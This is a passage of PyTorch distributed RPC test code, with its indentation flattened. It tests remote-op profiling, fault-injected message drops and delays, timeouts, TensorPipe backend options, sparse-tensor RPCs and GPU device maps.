with _profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempting to fork the RRef should raise an error indicating that the rpc.remote call timed out.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where the rpc.remote() creation message is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail the remote-call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
# on the owning nodes; this is expected because the OwnerRRef was never
# successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 1 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
# NOTE: we only test this when not sending to self, as to_here() calls
# localValue(), which does not send an RPC and thus does not have
# a timeout. This can be supported by allowing future.wait() to
# take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, the UserRRef will send out an RRefUserDelete,
# but this can be a no-op since the RRef may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify a timeout of 0, even though the
# default timeout remains short.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture, RpcTestCommon):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
# Set a high timeout since it doesn't affect test runtime and ensures
# the test doesn't erroneously time out due to slow machines.
timeout = 100
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
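# NB: a minimal sketch (not a test) of building TensorPipeRpcBackendOptions
# with the knobs exercised by the two tests above; the numbers are
# illustrative, not recommended values.
def _tensorpipe_options_sketch(self):
    return rpc.TensorPipeRpcBackendOptions(
        init_method=self.rpc_backend_options.init_method,
        num_worker_threads=16,  # size of the agent's thread pool
        rpc_timeout=60,         # default per-RPC timeout, in seconds
    )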
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
@dist_init
def _test_rref_get_type_timeout(self, blocking):
# Test where we try to get the type of an RRef from the owner, but the RRef
# creation is slower than the timeout passed into _get_type.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.5
expected_err = self.get_timeout_error_regex()
# Blocking: blocks on inline call
if blocking:
with self.assertRaisesRegex(RuntimeError, expected_err):
slow_rref._get_type(timeout=timeout, blocking=blocking)
# Non-blocking: blocks on wait
else:
fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
with self.assertRaisesRegex(RuntimeError, expected_err):
fut.wait()
# FIXME We wait until the remote has completed creating the OwnerRRef
# because there is currently a race if we shut down RPC before that.
slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Overloaded torch operator invoked from Python failed to many any schema"
):
rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
# Ensure RRef is created on remote node.
rref.to_here()
rref_api = getattr(rref, rref_proxy_api)
self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
expected_error = self.get_timeout_error_regex()
timeout = 2
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
if rref_api == rref.rpc_async:
result.wait()
elif rref_api == rref.remote:
result._get_future().wait()
# Case where rpc.remote() is stuck and exceeds timeout
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.01
rref_api = getattr(slow_rref, rref_proxy_api)
# Note that even when we call rref.rpc_async() in this case, we time out
# during future creation rather than while waiting on the future. This is
# because the rref proxy function calls rref._get_type before returning the
# future, and that call blocks until the RRef is created on the owner node
# or the specified timeout elapses.
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
# rpc_async returns immediately and surfaces a timeout through wait()
if rref_api == slow_rref.rpc_async:
result.wait()
# FIXME We wait until the remote has completed creating the OwnerRRef
# because there is currently a race if we shut down RPC before that.
slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
self._test_rref_proxy_timeout(rpc_api)
class MyConvNetForMNIST(nn.Module):
def __init__(self, device):
super().__init__()
self.net = nn.Sequential(
nn.Conv2d(1, 16, 3, 1),
nn.ReLU(),
nn.Conv2d(16, 32, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Flatten(1),
nn.Linear(4608, 128),
nn.ReLU(),
nn.Linear(128, 10),
).to(device)
self.device = device
def forward(self, x, is_rref=False):
x = x.to_here() if is_rref else x
with torch.cuda.stream(torch.cuda.current_stream(self.device)):
# intentionally adding delay to current CUDA stream
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
return self.net(x)
def __getstate__(self):
# return an empty dict to avoid inspecting the model contents on the
# owner
return {}
@dist_init
def test_send_to_rank_sparse(self):
dst_rank = (self.rank + 1) % self.world_size
# Test sparse tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor()
y = build_sparse_tensor()
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor(coalesce=True)
y = build_sparse_tensor(coalesce=True)
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
@dist_init
def test_self_py_udf_remote_sparse(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_rpc_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg_sparse(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_remote_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_remote_arg_sparse(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
def test_world_size_one_sparse(self):
self._world_size_one(
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_multi_rpc_sparse(self):
self._multi_rpc(True)
def test_wait_all_workers_sparse(self):
self._wait_all_workers(heavy_rpc_sparse, build_sparse_tensor())
def test_wait_all_workers_twice_sparse(self):
self._wait_all_workers_twice(heavy_rpc_sparse, build_sparse_tensor())
@dist_init
def test_py_sparse_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [build_sparse_tensor(), build_sparse_tensor()]
ret = rpc.rpc_sync(
worker_name(dst_rank), my_container_sum, args=(a,)
)
self.assertEqual(ret, my_container_sum(a))
@dist_init
def test_nested_rpc_sparse(self):
self._nested_rpc(nested_rpc_sparse, build_sparse_tensor() * 2)
@dist_init
def test_stress_heavy_rpc_sparse(self):
self._stress_test_rpc(heavy_rpc_sparse, repeat=20, args=(build_sparse_tensor(),))
@dist_init
def test_builtin_remote_ret_sparse(self):
self._builtin_remote_ret(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
@dist_init
def test_builtin_remote_self_sparse(self):
self._builtin_remote_self(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
@dist_init
def test_multi_builtin_remote_ret_sparse(self):
self._test_multi_remote_call(
torch.add, True,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_multi_py_udf_remote_sparse(self):
self._test_multi_remote_call(
my_function,
True,
kwargs_fn=RpcTest._multi_kwargs_fn
)
@dist_init
def test_py_rref_args_sparse(self):
self._py_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 4
)
@dist_init
def test_py_rref_args_user_share_sparse(self):
self._py_rref_args_user_share(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
@dist_init
def test_py_rpc_rref_args_sparse(self):
self._py_rpc_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
@dist_init
def test_nested_remote_sparse(self):
self._nested_remote(
nested_remote_sparse,
build_sparse_tensor() + build_sparse_tensor()
)
@dist_init
def test_nested_rref_sparse(self):
self._nested_rref(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_nested_rref_stress_sparse(self):
self._nested_rref_stress(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_my_parameter_server_sparse(self):
self._my_parameter_server(True)
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture, RpcTestCommon):
def _test_device_maps(self, options, errMsg):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(
options,
errMsg="Node worker0 has invalid target node names in its device maps"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(
options,
errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(
options,
errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(
options,
errMsg="Node worker0 has duplicated target devices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
x_device = "cpu" if x.device.type == "cpu" else x.device.index
y_device = "cpu" if y.device.type == "cpu" else y.device.index
if x_device == x_to and y_device == y_to:
return x.to(z_to) + y.to(z_to)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
x_to = device_map[x_from]
y_to = device_map[y_from]
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(x_from)
y = torch.ones(2).to(y_from)
ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
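# The callee computed the result on z_to; on the response path the same device
# map is applied in reverse, so the returned tensor is expected on the local
# device that maps to z_to. Inverting the 1-to-1 device map recovers that device.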
reverse_device_map = {device_map[k] : k for k in device_map}
z_from = reverse_device_map[z_to]
ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
self.assertEqual(ret_device, z_from)
self.assertEqual(ret, torch.ones(2).to(z_from))
rpc.shutdown()
def test_device_map_cpu(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to="cpu",
device_map={"cpu" : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_cpu_to_gpu_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=0,
device_map={"cpu" : 0},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_cpu_to_gpu_non_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=1,
device_map={"cpu" : 1},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_gpu_to_cpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to="cpu",
device_map={0 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_to_cpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to="cpu",
device_map={1 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=0,
device_map={0 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=1,
device_map={1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default_to_non_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=1,
device_map={0 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default_to_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=0,
device_map={1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0}
)
